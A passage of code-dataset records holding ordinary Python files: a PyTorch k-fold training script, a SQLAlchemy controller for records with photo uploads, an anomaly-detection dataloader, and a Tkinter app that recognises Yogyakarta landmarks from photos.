+{"seq_id": "627116689", "text": "import argparse\nimport collections\nfrom data_loader.data_loaders import *\nimport models.loss as module_loss\nimport models.metric as module_metric\nimport models.Pearattention.GAT_Pearson as module_arch\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils.util import *\nimport torch\nimport torch.nn as nn\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = False\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\ndef main(config, fold_id):\n batch_size = config[\"data_loader\"][\"args\"][\"batch_size\"]\n\n # build model architecture, initialize weights, then print to console\n model = config.init_obj('arch', module_arch)\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_normal_(p)\n print(f'The model has {count_parameters(model):,} trainable parameters')\n\n # get function handles of loss and metrics\n criterion_1 = getattr(module_loss, config['loss_1'])\n criterion_2 = getattr(module_loss, config['loss_2'])\n metrics = [getattr(module_metric, met) for met in config['metrics']]\n\n # build optimizer and trainer\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n\n optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n\n data_loader, valid_data_loader, data_count = data_generator_np(folds_data[fold_id][0],\n folds_data[fold_id][1], batch_size)\n weights_for_each_class = calc_class_weight(data_count)\n\n trainer = Trainer(model, criterion_1, criterion_2, metrics, optimizer,\n config=config,\n data_loader=data_loader,\n fold_id=fold_id,\n valid_data_loader=valid_data_loader,\n class_weights=weights_for_each_class)\n\n trainer.training()\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=\"config.json\", type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=\"0\", type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-f', '--fold_id', type=str,\n help='fold_id')\n args.add_argument('-da', '--np_data_dir', type=str,\n help='Directory containing numpy files')\n\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = []\n\n args2 = args.parse_args()\n fold_id = int(args2.fold_id)\n config = ConfigParser.from_args(args, fold_id, options)\n folds_data = load_folds_data(args2.np_data_dir, config[\"data_loader\"][\"args\"][\"num_folds\"])\n main(config, fold_id)\n\n", "sub_path": "PearNet/train_Kfold_CV.py", "file_name": "train_Kfold_CV.py", "file_ext": "py", "file_size_in_byte": 3065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "torch.manual_seed", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Pearattention.GAT_Pearson", "line_number": 29, "usage_type": "argument"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 32, "usage_type": "attribute"}, {"api_name": 
"torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "models.loss", "line_number": 36, "usage_type": "argument"}, {"api_name": "models.loss", "line_number": 37, "usage_type": "argument"}, {"api_name": "models.metric", "line_number": 38, "usage_type": "argument"}, {"api_name": "torch.optim", "line_number": 43, "usage_type": "attribute"}, {"api_name": "data_loader.data_loaders", "line_number": 45, "usage_type": "name"}, {"api_name": "trainer.Trainer", "line_number": 49, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 51, "usage_type": "name"}, {"api_name": "trainer.training", "line_number": 56, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 72, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 77, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "192177936", "text": "import os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import or_\nfrom models import Masalah, User, Pegawai, Tindakan\nfrom schemas.tindakan_schema import *\nimport bcrypt, string, random\nimport pathlib as pl\nfrom datetime import datetime, timedelta\n\nTINDAKAN_PATH = r'assets/tindakan/'\n\ndef create_file(foto: UploadFile):\n global TINDAKAN_PATH\n new_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 6))\n file_type = ''.join([r'.',foto.filename.split(r'.')[-1]])\n new_name = new_name.replace(\" \", r'-') + '__' + str(datetime.now().strftime(r'%Y%m%d%H%M%S')) + file_type\n pl.Path(r'{}{}'.format(TINDAKAN_PATH, new_name)).write_bytes(foto.file.read())\n foto.file.close()\n return r'{}{}'.format(TINDAKAN_PATH, new_name)\n\ndef put_file(foto: UploadFile, old_name):\n pl.Path(r'{}'.format(old_name)).unlink()\n return create_file(foto)\n\ndef get_tindakan_by_kondisi(db: Session, deskripsi: str):\n try:\n return db.query(Tindakan).filter(\n Tindakan.kondisi_awal == deskripsi,\n Tindakan.tindakan == deskripsi,\n Tindakan.kondisi_pasca == deskripsi,\n Tindakan.deleted_at == None).first()\n except Exception as e:\n print(e)\n db.rollback()\n return False\n\n\ndef get_tindakan_all(db: Session):\n try:\n return db.query(Tindakan).filter(Tindakan.deleted_at == None).all()\n except Exception as e:\n print('get_all_tindakan',e)\n db.rollback()\n return False\n\n\ndef get_tindakan_by_id(db: Session, id: int):\n try:\n return [True, \"sukses\", db.query(Tindakan).filter(Tindakan.id == id, Tindakan.deleted_at == None).first()]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef create_tindakan(db: Session, tindakan: TindakanCreate):\n db_tindakan = Tindakan(kondisi_awal=tindakan.kondisi_awal,\n tindakan=tindakan.tindakan,\n kondisi_pasca=tindakan.kondisi_pasca,\n id_user=tindakan.id_user,\n id_masalah=tindakan.id_masalah,\n id_kategori=tindakan.id_kategori,\n id_ruangan=tindakan.id_ruangan,\n id_sarana=tindakan.id_sarana)\n db_tindakan.foto = create_file(tindakan.foto) if tindakan.foto else None\n try:\n db.add(db_tindakan)\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", db_tindakan]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef update_tindakan(db: Session, tindakan: TindakanUpdate):\n db_tindakan = db.query(Tindakan).filter(Tindakan.id == tindakan.id, Tindakan.deleted_at == None).first()\n db_tindakan.kondisi_awal = tindakan.kondisi_awal if tindakan.kondisi_awal else db_tindakan.kondisi_awal\n db_tindakan.tindakan = tindakan.tindakan if tindakan.tindakan else db_tindakan.tindakan\n db_tindakan.kondisi_pasca = tindakan.kondisi_pasca if tindakan.kondisi_pasca else db_tindakan.kondisi_pasca\n db_tindakan.id_masalah = tindakan.id_masalah if tindakan.id_masalah else db_tindakan.id_masalah\n db_tindakan.id_ruangan = tindakan.id_ruangan if tindakan.id_ruangan else db_tindakan.id_ruangan\n db_tindakan.id_kategori = tindakan.id_kategori if tindakan.id_kategori else db_tindakan.id_kategori\n db_tindakan.id_sarana = tindakan.id_sarana if tindakan.id_sarana else db_tindakan.id_sarana\n db_tindakan.done_at = datetime.now() if tindakan.status else None\n db_tindakan.foto = put_file(tindakan.foto, db_tindakan.foto) if tindakan.foto else db_tindakan.foto\n try:\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", 
db_tindakan]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\n\ndef delete_tindakan_by_id(db: Session, id: int):\n try:\n db_tindakan = db.query(Tindakan).filter(Tindakan.id == id, Tindakan.deleted_at == None).first()\n if db_tindakan:\n db_tindakan.deleted_at = datetime.now()\n db.commit()\n db.refresh(db_tindakan)\n return [True, \"sukses\", db_tindakan]\n else:\n return [False, \"tindakan sudah dihapus\", []]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n\ndef search_tindakan(db: Session, key: str):\n try:\n db_tindakan = db.query(Tindakan).join(Tindakan.ruangan).join(Tindakan.kategori_tindakan\n ).join(Tindakan.sarana).join(Tindakan.masalah).filter(or_(\n Tindakan.kondisi_awal.ilike(r'%{}%'.format(key)),\n Tindakan.tindakan.ilike(r'%{}%'.format(key)),\n Tindakan.kondisi_pasca.ilike(r'%{}%'.format(key)),\n Tindakan.kategori_tindakan.property.mapper.class_.kategori.ilike(r'%{}%'.format(key)),\n Tindakan.sarana.property.mapper.class_.nama.ilike(r'%{}%'.format(key)),\n Tindakan.ruangan.property.mapper.class_.nama.ilike(r'%{}%'.format(key),),\n Tindakan.masalah.property.mapper.class_.deskripsi.ilike(r'%{}%'.format(key)),\n ), Tindakan.deleted_at == None)\n return [True, \"sukses\", db_tindakan.all()]\n except Exception as e:\n print(e)\n db.rollback()\n return [False, \"gagal\", []]\n", "sub_path": "controllers/tindakan_controller.py", "file_name": "tindakan_controller.py", "file_ext": "py", "file_size_in_byte": 5451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 17, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 17, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 30, "usage_type": "argument"}, {"api_name": "models.Tindakan.kondisi_awal", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Tindakan.tindakan", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Tindakan.kondisi_pasca", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 33, "usage_type": "name"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 43, "usage_type": "argument"}, {"api_name": "models.Tindakan.deleted_at", 
"line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 50, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 52, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 81, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 81, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 101, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 103, "usage_type": "argument"}, {"api_name": "models.Tindakan.id", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Tindakan", "line_number": 118, "usage_type": "argument"}, {"api_name": "models.Tindakan.ruangan", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Tindakan.kategori_tindakan", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Tindakan.sarana", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Tindakan.masalah", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sqlalchemy.or_", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_awal.ilike", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_awal", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Tindakan.tindakan.ilike", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Tindakan.tindakan", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 121, "usage_type": "name"}, {"api_name": "models.Tindakan.kondisi_pasca.ilike", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Tindakan.kondisi_pasca", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 122, "usage_type": "name"}, {"api_name": "models.Tindakan.kategori_tindakan.property.mapper.class_.kategori.ilike", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Tindakan.kategori_tindakan", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 123, "usage_type": "name"}, {"api_name": "models.Tindakan.sarana.property.mapper.class_.nama.ilike", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Tindakan.sarana", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 124, "usage_type": "name"}, 
{"api_name": "models.Tindakan.ruangan.property.mapper.class_.nama.ilike", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Tindakan.ruangan", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 125, "usage_type": "name"}, {"api_name": "models.Tindakan.masalah.property.mapper.class_.deskripsi.ilike", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Tindakan.masalah", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 126, "usage_type": "name"}, {"api_name": "models.Tindakan.deleted_at", "line_number": 127, "usage_type": "attribute"}, {"api_name": "models.Tindakan", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "185995436", "text": "import torch\nimport pandas as pd\n\n\n# import matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader, SequentialSampler, RandomSampler, TensorDataset\n\n\nservice_ = \"orders\"\nexperiment = \"memory\"\n# experiments_feature_sets = {\"cpu\": [0, 2, 3, 5, 6, 7], \"memory\":[0, 2, 3, 5, 6, 7]}\n\nexperiments_feature_sets = {\"cpu\": [0, 1, 2, 3, 5, 6, 7], \"memory\":[0, 1, 2, 3, 5, 6, 7]}\n\npath_train = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/normal_train.csv\"\npath_validation = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/normal_validation.csv\"\npath_test = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/\" + experiment + \"_test.csv\"\npath_labels = \"/home/matilda/PycharmProjects/RCA_metrics /3_Preprocessing_data/ready_data_training/\" + service_ + \"/\" + experiment + \"_labels.csv\"\n\nbatch_size = 512\n\nfeatures = list(pd.read_csv(path_train).columns[experiments_feature_sets[experiment]])\n# print()\nprint(pd.read_csv(path_validation).columns[experiments_feature_sets[experiment]])\n\ntrain = pd.read_csv(path_train)\n\ntrain = train.values\nvalidation = pd.read_csv(path_validation).values\ntest = pd.read_csv(path_test).values\nlabels = pd.read_csv(path_labels).loc[:, \"target\"]\n\ntrain = train[:, experiments_feature_sets[experiment]]\nvalidation = validation[:, experiments_feature_sets[experiment]]\ntest_ = test[:, experiments_feature_sets[experiment]]\n\ntrain_tensor = TensorDataset(torch.tensor(train, dtype=torch.float32))\ntrain_sampler = RandomSampler(train_tensor)\ntrain_dataloader = DataLoader(train_tensor, sampler=train_sampler, batch_size=batch_size)\n\nvalidation_tensor = TensorDataset(torch.tensor(validation, dtype=torch.float32))\nvalidation_sampler = SequentialSampler(validation_tensor)\nvalidation_dataloader = DataLoader(validation_tensor, sampler=validation_sampler, batch_size=batch_size)\n\n\n\n\nfrom collections import defaultdict\nanom_indecies = defaultdict(list)\nnormal_indecies = []\nkey = 1\ncontrolVar = False\n\n\nfor x in range(test_.shape[0]-2):\n\n if labels.values[x] == 1 and controlVar==False:\n controlVar = True\n\n if labels.values[x] == 1 and controlVar == True:\n anom_indecies[key].append(x)\n else:\n normal_indecies.append(x)\n\n if labels.values[x+1] == 0 and controlVar==True:\n controlVar = False\n key +=1\n\ntest_tensor = TensorDataset(torch.tensor(test_, dtype=torch.float32))\ntest_sampler = SequentialSampler(test_tensor)\ntest_dataloader = DataLoader(test_tensor, sampler=test_sampler, batch_size=batch_size)\n\n\ntest_tensor_1 = TensorDataset(torch.tensor(test_[anom_indecies[1]], dtype=torch.float32))\ntest_sampler_1 = SequentialSampler(test_tensor_1)\ntest_dataloader_1 = DataLoader(test_tensor_1, sampler=test_sampler_1, batch_size=batch_size)\n\n\ntest_tensor_2 = TensorDataset(torch.tensor(test_[anom_indecies[2]], dtype=torch.float32))\ntest_sampler_2 = SequentialSampler(test_tensor_2)\ntest_dataloader_2 = DataLoader(test_tensor_2, sampler=test_sampler_2, batch_size=batch_size)\n\n\ntest_tensor_3 = TensorDataset(torch.tensor(test_[anom_indecies[3]], dtype=torch.float32))\ntest_sampler_3 = SequentialSampler(test_tensor_3)\ntest_dataloader_3 = DataLoader(test_tensor_3, sampler=test_sampler_3, batch_size=batch_size)\n\n\ntest_tensor_4 = TensorDataset(torch.tensor(test_[anom_indecies[4]], 
dtype=torch.float32))\ntest_sampler_4 = SequentialSampler(test_tensor_4)\ntest_dataloader_4 = DataLoader(test_tensor_4, sampler=test_sampler_4, batch_size=batch_size)\n\n\ntest_tensor_5 = TensorDataset(torch.tensor(test_[anom_indecies[5]], dtype=torch.float32))\ntest_sampler_5 = SequentialSampler(test_tensor_5)\ntest_dataloader_5 = DataLoader(test_tensor_5, sampler=test_sampler_5, batch_size=batch_size)\n\ntest_tensor_6 = TensorDataset(torch.tensor(test_[anom_indecies[6]], dtype=torch.float32))\ntest_sampler_6 = SequentialSampler(test_tensor_6)\ntest_dataloader_6 = DataLoader(test_tensor_6, sampler=test_sampler_6, batch_size=batch_size)\n\ntest_loaders = [test_dataloader_1, test_dataloader_2, test_dataloader_3, test_dataloader_4, test_dataloader_5, test_dataloader_6]\n\n\n\n\n\n\n\n\n\n\n\n# pomaaaa = pd.read_csv(path_test)\n# plt.plot(pomaaaa.loc[:, \"ctn_memory\"])", "sub_path": "4_Analysis/new_scripts/dataloaders.py", "file_name": "dataloaders.py", "file_ext": "py", "file_size_in_byte": 4261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 79, "usage_type": "attribute"}, 
{"api_name": "torch.utils.data.SequentialSampler", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "408915503", "text": "import os\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport webbrowser\r\nimport joblib\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom shutil import copy2\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom xgboost import XGBClassifier\r\nfrom PIL import ImageTk\r\nfrom PIL import Image\r\n\r\n#define root\r\nroot=Tk()\r\nroot.geometry(\"800x300\")\r\nroot.title(\"Skripsi\")\r\n#import model\r\ndata80=pd.read_csv('models/word_220.csv')\r\nwith open('neigh220.pkl', 'rb') as file:\r\n\tneigh = pickle.load(file)\r\nwith open('models/mo,pkl', 'rb') as file:\r\n\tmp = pickle.load(file)\r\n\r\nmaps={'bent':'https://www.google.com/maps/place/Fort+Vredeburg+Museum/@-7.8002713,110.3641111,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a5788c0b3eecf:0xb9611ce0232a9ff8!8m2!3d-7.8002713!4d110.3662998',\r\n'boro':'https://www.google.com/maps/place/Borobudur+Temple/@-7.6078738,110.2015626,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a8cf009a7d697:0xdd34334744dc3cb!8m2!3d-7.6078738!4d110.2037513',\r\n'pinus':'https://www.google.com/maps/place/Hutan+Pinus+Mangunan+Dlingo/@-7.9267837,110.429808,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a536355abb129:0x9fb567811ef62e4e!8m2!3d-7.9267837!4d110.4319967',\r\n'ts': 'https://www.google.com/maps/place/Taman+Sari/@-7.8100812,110.3571798,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a57923d58046b:0x9fbd6cc9617191f4!8m2!3d-7.8100812!4d110.3593685',\r\n'tugu':'https://www.google.com/maps/place/Tugu/@-7.782984,110.3648463,17z/data=!3m1!4b1!4m5!3m4!1s0x2e7a591a4d553bd5:0xc0f964003add568b!8m2!3d-7.782984!4d110.367035',\r\n'unk': 'http://google.com/unknown',\r\n}\r\n\r\ndef knning():\r\n\tdico = extract_ciri()\r\n\r\n\tdiki = []\r\n\tfor n in range(len(dico)):\r\n\t\tr = neigh.predict(dico[n].reshape(1, -1))\r\n\t\tdiki.append(r)\r\n\r\n\tdataset = pd.DataFrame(np.zeros([1, 220], dtype=int))\r\n\t\r\n\tbuatkol = []\r\n\tfor i in range(220):\r\n\t\tbuatkol.append('p_' + str(i))\r\n\tdataset.columns = (buatkol)\r\n\r\n\tasain = []\r\n\tfor a in dataset.columns:\r\n\t\tlel = 0\r\n\t\tfor i in diki:\r\n\t\t\tif i == a:\r\n\t\t\t\tlel += 1\r\n\t\tasain.append(lel)\r\n\t\r\n\tdataset = dataset.append(pd.Series(asain, index=dataset.columns), ignore_index=True)\r\n\tlol = dataset.columns\r\n\tpre = pd.DataFrame(dataset.loc[1, lol], index=dataset.columns)\r\n\tpre = pre.transpose()\r\n\thasil = mp.predict(pre)\r\n\tprint(hasil)\r\n\tpro=mp.predict_proba(pre)\r\n\tprob=max(pro[0])\r\n\treturn hasil, prob\r\n\r\ndef extract_ciri():\r\n\tdico = []\r\n\tnem = ('pict.jpg')\r\n\timg = cv2.imread(nem)\r\n\tsift = cv2.xfeatures2d.SIFT_create()\r\n\tkp, des = sift.detectAndCompute(img, None)\r\n\r\n\tfor d in des:\r\n\t\tdico.append(d)\r\n\treturn dico\r\n\t\r\n#print(lis)\r\n\r\ndef doNothing():\r\n\tglobal lis, prob\r\n\tlis, prob = knning()\r\n\tprint(lis)\r\n\tif lis=='boro':\r\n\t\thasil=\"Borobudur,\"\r\n\t\thaha=\"terletak di kawasan Magelang, sekitar 40 km dari kota Yogyakarta. \\nBorobudur adalah candi atau kuil Buddha terbesar di dunia, sekaligus salah satu \\nmonumen Buddha terbesar di dunia. Monumen ini terdiri atas enam teras berbentuk \\nbujur sangkar yang di atasnya terdapat tiga pelataran melingkar, pada dindingnya \\ndihiasi dengan 2.672 panel relief dan aslinya terdapat 504 arca Buddha. 
(sumber: Wikipedia)\"\r\n\telif lis=='pinus':\r\n\t\thasil='Hutan Pinus Mangunan'\r\n\t\thaha=\"secara administrasi terletak di Desa Sudimoro, Kelurahan Muntuk, \\nKecamatan Dlingo, Kabupaten Bantul, Provinsi Daerah Istimewa Yogyakarta.\\nDahulunya kawasan ini merupakan kawasan tanah kering dan berkapur yang tingkat kesuburannya rendah. \\nKemudian oleh pemerintah melalui Perhutani wilayah ini dijadikan sebagai \\nResort Pengelolaan Hutan (RPH) dengan program utamanya yaitu melakukan reboisasi.(sumber: Siswapedia)\"\r\n\telif lis=='ts':\r\n\t\thasil='Taman Sari'\r\n\t\thaha=\"adalah situs bekas taman atau kebun istana Keraton Ngayogyakarta. \\nKebun ini dibangun pada zaman Sultan Hamengku Buwono I (HB I) pada tahun 1758-1765/9. \\nAwalnya, taman yang mendapat sebutan The Fragrant Garden ini memiliki \\nluas lebih dari 10 hektare dengan sekitar 57 bangunan baik berupa gedung, kolam pemandian, \\njembatan gantung, kanal air, maupun danau buatan beserta pulau buatan dan lorong bawah air. \\nKebun yang digunakan secara efektif antara 1765-1812 ini pada mulanya membentang dari \\nbarat daya kompleks Kedhaton sampai tenggara kompleks Magangan.(sumber: Wikipedia)\"\r\n\telif lis=='tugu':\r\n\t\thasil='Tugu Yogyakarta'\r\n\t\thaha=\"adalah sebuah tugu atau monumen yang sering dipakai sebagai simbol \\natau lambang dari kota Yogyakarta. Tugu ini dibangun oleh pemerintah Belanda setelah \\ntugu sebelumnya runtuh akibat gempa yang terjadi waktu itu. \\nTugu sebelumnya yang bernama Tugu Golong-Gilig dibangun oleh Hamengkubuwana I. \\nTugu yang terletak di perempatan Jalan Jenderal Sudirman dan Jalan Margo Utomo ini, \\nmempunyai nilai simbolis dan merupakan garis yang bersifat magis menghubungkan laut selatan, \\nkraton Jogja dan gunung Merapi. Pada saat melakukan meditasi, konon Sultan Yogyakarta pada waktu itu \\nmenggunakan tugu ini sebagai patokan arah menghadap puncak gunung Merapi.(sumber: Wikipedia)\"\r\n\telif 